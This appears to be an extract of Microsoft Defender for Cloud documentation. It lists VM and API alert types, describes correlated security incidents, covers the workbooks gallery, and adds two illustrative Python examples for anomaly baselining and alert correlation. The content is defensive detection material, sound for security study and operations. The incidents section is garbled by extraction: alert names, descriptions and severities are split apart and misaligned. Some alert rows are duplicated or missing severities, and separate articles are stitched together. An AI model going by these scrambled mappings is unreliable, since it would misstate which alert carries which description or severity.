| VM.Windows_SVCHostFromInvalidPath | Suspicious process executed | High |


| Alert Type | Alert Display Name | Severity |
|---|---|---|
| VM.Windows_SystemEventLogCleared | The Windows Security log was cleared | Informational |
| VM.Windows_TelegramInstallation | Detected potentially suspicious use of Telegram tool | Medium |
| VM.Windows_UndercoverProcess | Suspiciously named process detected | High |
| VM.Windows_UserAccountControlBypass | Detected change to a registry key that can be abused to bypass UAC | Medium |
| VM.Windows_VBScriptEncoding | Detected suspicious execution of VBScript.Encode command | Medium |
| VM.Windows_WindowPositionRegisteryChange | Suspicious WindowPosition registry value detected | Low |
| VM.Windows_ZincPortOpenningUsingFirewallRule | Malicious firewall rule created by ZINC server implant | |
| VM_DigitalCurrencyMining | Digital currency mining related behavior detected | |
| VM_MaliciousSQLActivity | Malicious SQL activity | |
| VM_ProcessWithDoubleExtensionExecution | Suspicious double extension file executed | |
| VM_RegistryPersistencyKey | Windows registry persistence method detected | |
| VM_ShadowCopyDeletion | Suspicious Volume Shadow Copy Activity | |
| VM_SuspectExecutablePath | Executable found running from a suspicious location | |
| | Executable found running from a suspicious location | |
| | Detected anomalous mix of uppercase and lowercase characters in command line | Medium |
| VM_SuspectPhp | Suspicious PHP execution detected | Medium |
| VM_SuspiciousCommandLineExecution | Suspicious command execution | High |
| VM_SuspiciousScreenSaverExecution | Suspicious Screensaver process executed | Medium |
| VM_SvcHostRunInRareServiceGroup | Rare SVCHOST service group executed | Informational |
| VM_SystemProcessInAbnormalContext | Suspicious system process executed | Medium |
| VM_ThreatIntelCommandLineSuspectDomain | A possible connection to malicious location has been detected | Medium |
| VM_ThreatIntelSuspectLogon | A logon from a malicious IP has been detected | High |
| VM_VbScriptHttpObjectAllocation | VBScript HTTP object allocation detected | High |


Alerts for Defender for APIs


| Alert (alert type) | Description | MITRE tactics | Severity |
|---|---|---|---|
| (Preview) Suspicious population-level spike in API traffic to an API endpoint (API_PopulationSpikeInAPITraffic) | A suspicious spike in API traffic was detected at one of the API endpoints. The detection system used historical traffic patterns to establish a baseline for routine API traffic volume between all IPs and the endpoint, with the baseline being specific to API traffic for each status code (such as 200 Success). The detection system flagged an unusual deviation from this baseline leading to the detection of suspicious activity. | Impact | Medium |


| Alert (alert type) | Description | MITRE tactics | Severity |
|---|---|---|---|
| (Preview) Suspicious spike in API traffic from a single IP address to an API endpoint (API_SpikeInAPITraffic) | A suspicious spike in API traffic was detected from a client IP to the API endpoint. The detection system used historical traffic patterns to establish a baseline for routine API traffic volume to the endpoint from a specific IP. The detection system flagged an unusual deviation from this baseline leading to the detection of suspicious activity. | Impact | Medium |
| (Preview) Unusually large response payload transmitted between a single IP address and an API endpoint (API_SpikeInPayload) | A suspicious spike in API response payload size was observed for traffic between a single IP and one of the API endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the typical API response payload size between a specific IP and API endpoint. The learned baseline is specific to API traffic for each status code (e.g., 200 Success). The alert was triggered because an API response payload size deviated significantly from the historical baseline. | Initial access | Medium |
| (Preview) Unusually large request body transmitted between a single IP address and an API endpoint (API_SpikeInPayload) | A suspicious spike in API request body size was observed for traffic between a single IP and one of the API endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the typical API request body size between a specific IP and API endpoint. The learned baseline is specific to API traffic for each status code (e.g., 200 Success). The alert was triggered because an API request size deviated significantly from the historical baseline. | Initial access | Medium |
| (Preview) Suspicious spike in latency for traffic between a single IP address and an API endpoint (API_SpikeInLatency) | A suspicious spike in latency was observed for traffic between a single IP and one of the API endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the routine API traffic latency between a specific IP and API endpoint. The learned baseline is specific to API traffic for each status code (e.g., 200 Success). The alert was triggered because an API call latency deviated significantly from the historical baseline. | Initial access | Medium |
| (Preview) API requests spray from a single IP address to an unusually large number of distinct API endpoints (API_SprayInRequests) | A single IP was observed making API calls to an unusually large number of distinct endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the typical number of distinct endpoints called by a single IP across 20-minute windows. The alert was triggered because a single IP's behavior deviated significantly from the historical baseline. | Discovery | Medium |
| (Preview) Parameter enumeration on an API endpoint (API_ParameterEnumeration) | A single IP was observed enumerating parameters when accessing one of the API endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the typical number of distinct parameter values used by a single IP when accessing this endpoint across 20-minute windows. The alert was triggered because a single client IP recently accessed an endpoint using an unusually large number of distinct parameter values. | Initial access | Medium |
| (Preview) Distributed parameter enumeration on an API endpoint (API_DistributedParameterEnumeration) | The aggregate user population (all IPs) was observed enumerating parameters when accessing one of the API endpoints. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a baseline that represents the typical number of distinct parameter values used by the user population (all IPs) when accessing an endpoint across 20-minute windows. The alert was triggered because the user population recently accessed an endpoint using an unusually large number of distinct parameter values. | Initial access | Medium |
| (Preview) Parameter value(s) with anomalous data types in an API call (API_UnseenParamType) | A single IP was observed accessing one of your API endpoints and using parameter values of a low probability data type (e.g., string, integer, etc.). Based on historical traffic patterns from the last 30 days, Defender for APIs learns the expected data types for each API parameter. The alert was triggered because an IP recently accessed an endpoint using a previously low probability data type as a parameter input. | Impact | Medium |
| (Preview) Previously unseen parameter used in an API call (API_UnseenParam) | A single IP was observed accessing one of the API endpoints using a previously unseen or out-of-bounds parameter in the request. Based on historical traffic patterns from the last 30 days, Defender for APIs learns a set of expected parameters associated with calls to an endpoint. The alert was triggered because an IP recently accessed an endpoint using a previously unseen parameter. | Impact | Medium |
| (Preview) Access from a Tor exit node to an API endpoint (API_AccessFromTorExitNode) | An IP address from the Tor network accessed one of your API endpoints. Tor is a network that allows people to access the Internet while keeping their real IP hidden. Though there are legitimate uses, it is frequently used by attackers to hide their identity when they target people's systems online. | Pre-attack | Medium |
| (Preview) API Endpoint access from suspicious IP (API_AccessFromSuspiciousIP) | An IP address accessing one of your API endpoints was identified by Microsoft Threat Intelligence as having a high probability of being a threat. While observing malicious Internet traffic, this IP came up as involved in attacking other online targets. | Pre-attack | High |
| (Preview) Suspicious User Agent detected (API_AccessFromSuspiciousUserAgent) | The user agent of a request accessing one of your API endpoints contained anomalous values indicative of an attempt at remote code execution. This does not mean that any of your API endpoints have been breached, but it does suggest that an attempted attack is underway. | Execution | Medium |


Next steps


- Security alerts in Microsoft Defender for Cloud
- Manage and respond to security alerts in Microsoft Defender for Cloud
- Continuously export Defender for Cloud data
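The spike and enumeration alerts above share one mechanism: a baseline learned from history (per IP, per endpoint and per status code, or across the whole population) is compared with the current 20-minute window. The following is an added illustration of that mechanism written for this page; it is not Defender for APIs code, and the record layout, the 24-hour baseline period (the descriptions say 30 days), the three-standard-deviation threshold and the sample logs are all constructed assumptions. It goes slightly beyond any single row by applying the same detector to three features: per-IP request volume, population-level request volume, and the number of distinct parameter values a client sends.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

WINDOW = timedelta(minutes=20)   # aggregation window named in the alert descriptions
SIGMA = 3.0                       # placeholder deviation threshold (an assumption, not the product's value)

# Constructed baseline period: 24 hours = 72 windows (the descriptions above use 30 days).
START = datetime(2023, 10, 1)
END = START + timedelta(hours=24)


def request_volume(recs):
    """Feature: requests per (client_ip, endpoint, status), the per-IP, per-status-code baseline."""
    counts = defaultdict(int)
    for r in recs:
        counts[(r["ip"], r["endpoint"], r["status"])] += 1
    return counts


def population_volume(recs):
    """Feature: requests per (endpoint, status) across all IPs, the population-level baseline."""
    counts = defaultdict(int)
    for r in recs:
        counts[(r["endpoint"], r["status"])] += 1
    return counts


def distinct_param_values(recs):
    """Feature: number of distinct (parameter, value) pairs a client sent to an endpoint."""
    seen = defaultdict(set)
    for r in recs:
        for name, value in r["params"].items():
            seen[(r["ip"], r["endpoint"])].add((name, value))
    return {k: len(v) for k, v in seen.items()}


def learn_baseline(history, start, end, feature):
    """Per key, the feature's value in every historical window (0 when the key was absent)."""
    n = int((end - start) // WINDOW)
    buckets = [[] for _ in range(n)]
    for r in history:
        i = int((r["ts"] - start) // WINDOW)
        if 0 <= i < n:
            buckets[i].append(r)
    per_window = [feature(b) for b in buckets]
    keys = set().union(*per_window)
    return {k: [f.get(k, 0) for f in per_window] for k in keys}


def detect(baseline, current_window, feature, sigma=SIGMA):
    """Flag keys whose value in the current window exceeds mean + sigma * stdev of the baseline."""
    alerts = []
    for key, value in feature(current_window).items():
        hist = baseline.get(key)
        if not hist:
            continue  # never seen before: nothing to deviate from (the "unseen" alerts are a separate rule)
        mu, sd = mean(hist), pstdev(hist)
        threshold = mu + sigma * max(sd, 1.0)   # floor on stdev so a perfectly flat history still has a margin
        if value > threshold:
            alerts.append({"key": key, "value": value, "baseline_mean": round(mu, 2), "threshold": threshold})
    return alerts


def sample_logs():
    """Constructed logs: two quiet clients, then one of them sending 60 requests with 60 distinct ids."""
    def req(ts, ip, order_id):
        return {"ts": ts, "ip": ip, "endpoint": "/api/orders", "status": 200, "params": {"id": order_id}}
    history = []
    for w in range(72):
        t0 = START + w * WINDOW
        for ip in ("10.0.0.5", "198.51.100.7"):
            history += [req(t0 + timedelta(minutes=j), ip, str(1001 + j % 3)) for j in range(5)]
    current = [req(END + timedelta(minutes=j), "198.51.100.7", str(1001 + j % 3)) for j in range(5)]
    current += [req(END + timedelta(seconds=j), "10.0.0.5", str(5000 + j)) for j in range(60)]
    return history, current


def run_demo():
    """Return (per-IP volume alerts, population volume alerts, parameter-enumeration alerts)."""
    history, current = sample_logs()
    return tuple(
        detect(learn_baseline(history, START, END, f), current, f)
        for f in (request_volume, population_volume, distinct_param_values)
    )


if __name__ == "__main__":
    for label, found in zip(("per-IP spike", "population spike", "parameter enumeration"), run_demo()):
        print(label, found)
```

The quiet client never crosses its threshold, while the client that switches from three recurring ids to sixty new ones fires both the per-IP volume check and the parameter-enumeration check, and its extra traffic is enough to fire the population-level check as well. Keying the baseline on the status code matters in practice: a burst of 404 or 401 responses from one client is a different signal from a burst of 200s, and folding them together would hide it.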


Incidents - a reference guide 


Article · 10/15/2023


Note

For incidents that are in preview: The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability.


This article lists the incidents you might get from Microsoft Defender for Cloud and any 
Microsoft Defender plans you've enabled. The incidents shown in your environment 
depend on the resources and services you're protecting, and your customized 
configuration. 


A security incident is a correlation of alerts into an attack story: the alerts share an entity (for example, a resource, an IP address, or a user) or share a kill chain pattern.


You can select an incident to view all of the alerts that are related to the incident and get 
more information. 


Learn how to manage security incidents. 
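To make that correlation rule concrete, here is an added example written for this page; it is not Defender for Cloud's implementation. It assumes each alert carries its entities as a small mapping (resource, ip, user), links alerts transitively through any shared entity, and, following the wording of the incident descriptions in the table that follows, promotes a group to an incident only when its alerts come from at least two different Defender for Cloud plans. The alert ids, plan names, display names and entity values are constructed placeholders, and the incident severity rule (highest member severity) is an assumption.

```python
from collections import Counter, defaultdict

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}   # ordering used on this page

# Constructed sample alerts: ids, plans, names and entity values are placeholders.
ALERTS = [
    {"id": "a1", "plan": "Defender for Servers", "name": "Suspicious command execution",
     "severity": "Medium", "entities": {"resource": "vm-web-01", "ip": "203.0.113.9"}},
    {"id": "a2", "plan": "Defender for Servers", "name": "Possible data exfiltration detected",
     "severity": "Medium", "entities": {"resource": "vm-web-01"}},
    {"id": "a3", "plan": "Defender for Storage", "name": "Access from a suspicious IP address",
     "severity": "High", "entities": {"resource": "stlogs01", "ip": "203.0.113.9"}},
    {"id": "a4", "plan": "Defender for Key Vault", "name": "Unusual secret listing",
     "severity": "Medium", "entities": {"resource": "kv-prod-01", "user": "svc-deploy"}},
    {"id": "a5", "plan": "Defender for Key Vault", "name": "Unusual application accessed a key vault",
     "severity": "Low", "entities": {"resource": "kv-prod-01", "user": "svc-deploy"}},
    {"id": "a6", "plan": "Defender for App Service", "name": "Suspicious process executed",
     "severity": "Medium", "entities": {"resource": "app-portal-01", "ip": "198.51.100.20"}},
]


def correlate(alerts, min_plans=2):
    """Group alerts that share an entity; a group spanning at least `min_plans` plans is an incident.

    Links are transitive: a1 shares a resource with a2 and an IP with a3, so all three land in one
    group. The min_plans rule is an assumption modelled on the incident descriptions on this page.
    Returns (incidents, uncorrelated_alerts); every alert also remains visible on its own.
    """
    parent = list(range(len(alerts)))           # union-find over alert indexes

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]       # path halving
            i = parent[i]
        return i

    first_seen = {}                              # (entity_type, value) -> first alert carrying it
    for i, alert in enumerate(alerts):
        for entity in alert["entities"].items():
            if entity in first_seen:
                parent[find(i)] = find(first_seen[entity])
            else:
                first_seen[entity] = i

    groups = defaultdict(list)
    for i, alert in enumerate(alerts):
        groups[find(i)].append(alert)

    incidents, uncorrelated = [], []
    for members in groups.values():
        plans = sorted({a["plan"] for a in members})
        if len(members) < 2 or len(plans) < min_plans:
            uncorrelated.extend(members)
            continue
        entity_counts = Counter(e for a in members for e in a["entities"].items())
        incidents.append({
            "alerts": [a["id"] for a in members],
            "plans": plans,
            "shared_entities": sorted(e for e, n in entity_counts.items() if n >= 2),
            "severity": max((a["severity"] for a in members), key=SEVERITY_RANK.__getitem__),
        })
    return incidents, uncorrelated


if __name__ == "__main__":
    found, rest = correlate(ALERTS)
    for inc in found:
        print("incident:", inc)
    print("not correlated:", [a["id"] for a in rest])
```

On the constructed input, the two Defender for Servers alerts on vm-web-01 and the Defender for Storage alert from the same source IP form one High incident, while the two Key Vault alerts stay uncorrelated because they come from a single plan, and the App Service alert shares no entity with anything. The shared-entity list in the incident is what an analyst would pivot on first.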


Note

The same alert can exist as part of an incident and also be visible as a standalone alert.


Security incident 


Further details and notes 


| Alert | Description | Severity |
|---|---|---|
| Security incident detected suspicious virtual machines | This incident indicates suspicious activity on your virtual machines. Multiple alerts from different Defender for Cloud plans have been triggered revealing a similar activity pattern on your virtual machines. This might indicate a threat actor has gained unauthorized access to your environment and is attempting to compromise it. | Medium/High |
| Security incident detected suspicious source IP activity | This incident indicates that suspicious activity has been detected on the same source IP. Multiple alerts from different Defender for Cloud plans have been triggered on the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious activity on the same IP address might indicate that an attacker has gained unauthorized access to your environment and is attempting to compromise it. | Medium/High |
| Security incident detected on multiple resources | This incident indicates that suspicious activity has been detected on your cloud resources. Multiple alerts from different Defender for Cloud plans have been triggered, revealing that similar attack methods were performed on your cloud resources. This might indicate a threat actor has gained unauthorized access to your environment and is attempting to compromise it. | Medium/High |
| Security incident detected suspicious user activity (Preview) | This incident indicates suspicious user operations in your environment. Multiple alerts from different Defender for Cloud plans have been triggered by this user, which increases the fidelity of malicious activity in your environment. While this activity may be legitimate, a threat actor might utilize such operations to compromise resources in your environment. This might indicate that the account is compromised and is being used with malicious intent. | High |
| Security incident detected suspicious service principal activity (Preview) | This incident indicates suspicious service principal operations in your environment. Multiple alerts from different Defender for Cloud plans have been triggered by this service principal, which increases the fidelity of malicious activity in your environment. While this activity may be legitimate, a threat actor might utilize such operations to compromise resources in your environment. This might indicate that the service principal is compromised and is being used with malicious intent. | High |
| Security incident detected suspicious crypto mining activity (Preview) | Scenario 1: This incident indicates that suspicious crypto mining activity has been detected following suspicious user or service principal activity. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate a threat actor gained unauthorized access to your environment, and the succeeding crypto mining activity may suggest that they successfully compromised your resource and are using it for mining cryptocurrencies, which can lead to increased costs for your organization. Scenario 2: This incident indicates that suspicious crypto mining activity has been detected following a brute force attack on the same virtual machine resource. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. The brute force attack on the virtual machine might indicate that a threat actor is attempting to gain unauthorized access to your environment, and the succeeding crypto mining activity may suggest they successfully compromised your resource and are using it for mining cryptocurrencies, which can lead to increased costs for your organization. | High |
| Security incident detected suspicious Key Vault activity (Preview) | Scenario 1: This incident indicates that suspicious activity has been detected in your environment related to the usage of Key Vault. Multiple alerts from different Defender for Cloud plans have been triggered by this user or service principal, which increases the fidelity of malicious activity in your environment. Suspicious Key Vault activity might indicate that a threat actor is attempting to gain access to your sensitive data, such as keys, secrets, and certificates, and the account is compromised and is being used with malicious intent. Scenario 2: This incident indicates that suspicious activity has been detected in your environment related to the usage of Key Vault. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious Key Vault activity might indicate that a threat actor is attempting to gain access to your sensitive data, such as keys, secrets, and certificates, and the account is compromised and is being used with malicious intent. Scenario 3: This incident indicates that suspicious activity has been detected in your environment related to the usage of Key Vault. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious Key Vault activity might indicate that a threat actor is attempting to gain access to your sensitive data, such as keys, secrets, and certificates, and the account is compromised and is being used with malicious intent. | High |
| Security incident detected suspicious SAS activity (Preview) | This incident indicates that suspicious activity has been detected following the potential misuse of a SAS token. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. The usage of a SAS token can indicate that a threat actor has gained unauthorized access to your storage account and is attempting to access or exfiltrate sensitive data. | High |
| Security incident detected anomalous geographical location activity (Preview) | Scenario 1: This incident indicates that anomalous geographical location activity has been detected in your environment. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious activity originating from anomalous locations might indicate that a threat actor gained unauthorized access to your environment and is attempting to compromise it. Scenario 2: This incident indicates that anomalous geographical location activity has been detected in your environment. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious activity originating from anomalous locations might indicate that a threat actor gained unauthorized access to your environment and is attempting to compromise it. | High |
| Security incident detected suspicious IP activity (Preview) | Scenario 1: This incident indicates that suspicious activity has been detected originating from a suspicious IP address. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious activity originating from a suspicious IP address might indicate that an attacker has gained unauthorized access to your environment and is attempting to compromise it. Scenario 2: This incident indicates that suspicious activity has been detected originating from a suspicious IP address. Multiple alerts from different Defender for Cloud plans have been triggered on the same user or service principal, which increases the fidelity of malicious activity in your environment. Suspicious activity originating from a suspicious IP address can indicate that an attacker has gained unauthorized access to your environment and is attempting to compromise it. | High |
| Security incident detected suspicious fileless attack activity (Preview) | This incident indicates that a fileless attack toolkit has been detected on a virtual machine following a potential exploit attempt on the same resource. Multiple alerts from different Defender for Cloud plans have been triggered on the same virtual machine, which increases the fidelity of malicious activity in your environment. The presence of a fileless attack toolkit on the virtual machine might indicate that a threat actor has gained unauthorized access to your environment and is attempting to evade detection while carrying out further malicious activities. | High |
| Security incident detected suspicious DDOS activity (Preview) | This incident indicates that suspicious Distributed Denial of Service (DDOS) activity has been detected in your environment. DDOS attacks are designed to overwhelm your network or application with a high volume of traffic, causing it to become unavailable to legitimate users. Multiple alerts from different Defender for Cloud plans have been triggered on the same IP address, which increases the fidelity of malicious activity in your environment. | High |
| Security incident detected suspicious data exfiltration activity (Preview) | Scenario 1: This incident indicates that suspicious data exfiltration activity has been detected following suspicious user or service principal activity. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate that a threat actor gained unauthorized access to your environment, and the succeeding data exfiltration activity may suggest that they are attempting to steal sensitive information. Scenario 2: This incident indicates that suspicious data exfiltration activity has been detected following suspicious user or service principal activity. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate that a threat actor gained unauthorized access to your environment, and the succeeding data exfiltration activity may suggest that they are attempting to steal sensitive information. Scenario 3: This incident indicates that suspicious data exfiltration activity has been detected following an unusual password reset on a virtual machine. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate that a threat actor gained unauthorized access to your environment, and the succeeding data exfiltration activity may suggest that they are attempting to steal sensitive information. | High |
| Security incident detected suspicious API activity (Preview) | This incident indicates that suspicious API activity has been detected. Multiple alerts from Defender for Cloud have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious API usage might indicate that a threat actor is attempting to access sensitive information or execute unauthorized actions. | High |
| Security incident detected suspicious Kubernetes cluster activity (Preview) | This incident indicates that suspicious activity has been detected on your Kubernetes cluster following suspicious user activity. Multiple alerts from different Defender for Cloud plans have been triggered on the same cluster, which increases the fidelity of malicious activity in your environment. The suspicious activity on your Kubernetes cluster might indicate that a threat actor has gained unauthorized access to your environment and is attempting to compromise it. | High |
| Security incident detected suspicious storage activity (Preview) | Scenario 1: This incident indicates that suspicious storage activity has been detected following suspicious user or service principal activity. Multiple alerts from different Defender for Cloud plans have been triggered on the same resource, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate that a threat actor gained unauthorized access to your environment, and the succeeding suspicious storage activity may suggest they are attempting to access potentially sensitive data. Scenario 2: This incident indicates that suspicious storage activity has been detected following suspicious user or service principal activity. Multiple alerts from different Defender for Cloud plans have been triggered from the same IP address, which increases the fidelity of malicious activity in your environment. Suspicious account activity might indicate that a threat actor gained unauthorized access to your environment, and the succeeding suspicious storage activity may suggest they are attempting to access potentially sensitive data. | High |
| Security incident detected suspicious Azure toolkit activity (Preview) | This incident indicates that suspicious activity has been detected following the potential usage of an Azure toolkit. Multiple alerts from different Defender for Cloud plans have been triggered on the same user or service principal, which increases the fidelity of malicious activity in your environment. The usage of an Azure toolkit can indicate | |
| Security incident detected suspicious DNS activity (Preview) | | |
| Security incident detected suspicious SQL activity (Preview) | | |
| Security incident detected suspicious | | |
that an attacker has gained unauthorized access to your 
environment and is attempting to compromise it. 


Scenario 1: This incident indicates that suspicious DNS 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered on the 
same resource, which increases the fidelity of malicious 
activity in your environment. Suspicious DNS activity 
might indicate that a threat actor gained unauthorized 
access to your environment and is attempting to 
compromise it. 


Scenario 2: This incident indicates that suspicious DNS 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered from the 
same IP address, which increases the fidelity of malicious 
activity in your environment. Suspicious DNS activity 
might indicate that a threat actor gained unauthorized 
access to your environment and is attempting to 
compromise it. 


Scenario 1: This incident indicates that suspicious SQL 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered from the 
same IP address, which increases the fidelity of malicious 
activity in your environment. Suspicious SQL activity might 
indicate that a threat actor is targeting your SQL server 
and is attempting to compromise it. 


Scenario 2: This incident indicates that suspicious SQL 
activity has been detected. Multiple alerts from different 
Defender for Cloud plans have been triggered on the 
same resource, which increases the fidelity of malicious 
activity in your environment. Suspicious SQL activity might 
indicate that a threat actor is targeting your SQL server 
and is attempting to compromise it. 


Scenario 1: This incident indicates that suspicious activity 
has been detected in your app service environment. 


Severity 


High 


Medium 


High 


High 


Alert 


app service activity 
(Preview) 


Security incident 
detected 
compromised 
machine 


Security incident 
detected 
compromised 
machine with 
botnet 
communication 


Security incident 
detected 
compromised 
machines with 
botnet 
communication 


Security incident 
detected 
compromised 
machine with 
malicious outgoing 
activity 


Description Severity 


Multiple alerts from different Defender for Cloud plans 
have been triggered on the same resource, which 
increases the fidelity of malicious activity in your 
environment. Suspicious app service activity might 
indicate that a threat actor is targeting your application 
and may be attempting to compromise it. 


Scenario 2: This incident indicates that suspicious activity 
has been detected in your app service environment. 
Multiple alerts from different Defender for Cloud plans 
have been triggered from the same IP address, which 
increases the fidelity of malicious activity in your 
environment. Suspicious app service activity might 
indicate that a threat actor is targeting your application 
and may be attempting to compromise it. 


This incident indicates suspicious activity on one or more Medium/High 
of your virtual machines. Multiple alerts from different 

Defender for Cloud plans have been triggered in 

chronological order on the same resource, following the 

MITRE ATT&CK framework. This might indicate a threat 

actor has gained unauthorized access to your 


environment and successfully compromised this machine. 


This incident indicates suspicious botnet activity on your Medium/High 
virtual machine. Multiple alerts from different Defender for 

Cloud plans have been triggered in chronological order 

on the same resource, following the MITRE ATT&CK 

framework. This might indicate a threat actor has gained 

unauthorized access to your environment and is 


attempting to compromise it. 


This incident indicates suspicious botnet activity on your Medium/High 
virtual machines. Multiple alerts from different Defender 

for Cloud plans have been triggered in chronological 

order on the same resource, following the MITRE ATT&CK 

framework. This might indicate a threat actor has gained 

unauthorized access to your environment and is 


attempting to compromise it. 


This incident indicates suspicious outgoing activity on Medium/High 
your virtual machine. Multiple alerts from different 

Defender for Cloud plans have been triggered in 

chronological order on the same resource, following the 

MITRE ATT&CK framework. This might indicate a threat 

actor has gained unauthorized access to your 


environment and is attempting to compromise it. 


Alert 


Security incident 
detected 
compromised 
machines 


Security incident 
detected 
compromised 
machines with 
malicious outgoing 
activity 


Security incident 
detected on 
multiple machines 


Security incident 
with shared process 
detected 


Next steps 


Description 


This incident indicates suspicious activity on one or more 
of your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resources, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and successfully compromised these 
machines. 


This incident indicates suspicious outgoing activity from 
your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resources, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and is attempting to compromise it. 


This incident indicates suspicious activity on one or more 
of your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered in 
chronological order on the same resource, following the 
MITRE ATT&CK framework. This might indicate a threat 
actor has gained unauthorized access to your 
environment and is attempting to compromise it. 


Scenario 1: This incident indicates suspicious activity on 
your virtual machine. Multiple alerts from different 
Defender for Cloud plans have been triggered sharing the 
same process. This might indicate a threat actor has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Scenario 2: This incident indicates suspicious activity on 
your virtual machines. Multiple alerts from different 
Defender for Cloud plans have been triggered sharing the 
same process. This might indicate a threat actor has 
gained unauthorized access to your environment and is 
attempting to compromise it. 


Manage security incidents in Microsoft Defender for Cloud 


Severity 


Medium/High 


Medium/High 


Medium/High 


Medium/High 


Create rich, interactive reports of Defender for Cloud data


Article 03/14/2023


Azure Workbooks provide a flexible canvas for data analysis and the creation of rich visual reports within the Azure portal. They allow you to tap into multiple data sources from across Azure, and combine them into unified interactive experiences.


Workbooks provide a rich set of capabilities for visualizing your Azure data. For detailed 
examples of each visualization type, see the visualizations examples and documentation. 


Within Microsoft Defender for Cloud, you can access the built-in workbooks to track 
your organization's security posture. You can also build custom workbooks to view a 
wide range of data from Defender for Cloud or other supported data sources. 


[Screenshot: Microsoft Defender for Cloud | Workbooks | Secure Score Over Time, showing 'Top recommendations with recent increase in unhealthy resources' (a table of recommendation names with their unhealthy resource counts) and 'Security controls scores over time (weekly)' (a chart of weekly scores for controls such as Enable MFA, Encrypt data in transit, Secure management ports and Restrict unauthorized network access)]


For pricing, check out the pricing page.


Prerequisites 


Required roles and permissions: To save workbooks, you must have at least Workbook Contributor permissions on the target resource group.


Cloud availability: Commercial clouds; National clouds (Azure Government, Azure China 21Vianet)


Workbooks gallery in Microsoft Defender for Cloud


With the integrated Azure Workbooks functionality, Microsoft Defender for Cloud makes 
it straightforward to build your own custom, interactive workbooks. Defender for Cloud 
also includes a gallery with the following workbooks ready for your customization: 


• 'Secure Score Over Time' workbook - Track your subscriptions' scores and changes to recommendations for your resources

• 'System Updates' workbook - View missing system updates by resources, OS, severity, and more

• 'Vulnerability Assessment Findings' workbook - View the findings of vulnerability scans of your Azure resources

• 'Compliance Over Time' workbook - View the status of a subscription's compliance with the regulatory or industry standards you've selected

• 'Active Alerts' workbook - View active alerts by severity, type, tag, MITRE ATT&CK tactics, and location.

• 'Price Estimation' workbook - View monthly consolidated price estimations for Microsoft Defender for Cloud plans based on the resource telemetry in your own environment. These numbers are estimates based on retail prices and don't provide actual billing data.

• 'Governance' workbook - The governance report in the governance rules settings lets you track the progress of the rules in effect in the organization.

• 'DevOps Security (Preview)' workbook - View a customizable foundation that helps you visualize the state of your DevOps posture for the connectors you've configured.


In addition to the built-in workbooks, you can also find other useful workbooks under the "Community" category; these are provided as is, with no SLA or support. Choose one of the supplied workbooks or create your own.


[Screenshot: Microsoft Defender for Cloud | Workbooks | Gallery, showing the Quick start, Recently modified workbooks and Defender for Cloud sections of the gallery, including the Secure Score Over Time, System Updates, Compliance Over Time, Governance (Preview), Coverage, Active Alerts, Ransomware Dashboard and Price Estimation workbooks]


Tip

Use the Edit button to customize any of the supplied workbooks to your satisfaction. When you're done editing, select Save and your changes will be saved to a new workbook.


[Screenshot: Microsoft Defender for Cloud | Workbooks | Secure Score Over Time, with the Edit, Help and Auto refresh toolbar]


Use the 'Secure Score Over Time' workbook 


This workbook uses secure score data from your Log Analytics workspace. That data needs to be exported from the continuous export tool as described in Configure continuous export from the Defender for Cloud pages in Azure portal.


When you set up the continuous export, set the export frequency to both streaming updates and snapshots.


[Screenshot: Export frequency settings. Streaming updates: export updates in real-time. Snapshots (Preview): export a weekly snapshot of the data types selected under 'Exported data types'; the supported data types are overall secure score, secure score controls and regulatory compliance.]


Note

Snapshots get exported weekly, so you'll need to wait at least one week for the first snapshot to be exported before you can view data in this workbook.


Tip

To configure continuous export across your organization, use the supplied Azure Policy 'DeployIfNotExist' policies described in Configure continuous export at scale.


The secure score over time workbook has five graphs for the subscriptions reporting to the selected workspaces:


Graph: Score trends for the last week and month
Use this section to monitor the current score and general trends of the scores for your subscriptions.


Graph: Aggregated score for all selected subscriptions
Hover your mouse over any point in the trend line to see the aggregated score at any date in the selected time range.


Graph: Recommendations with the most unhealthy resources
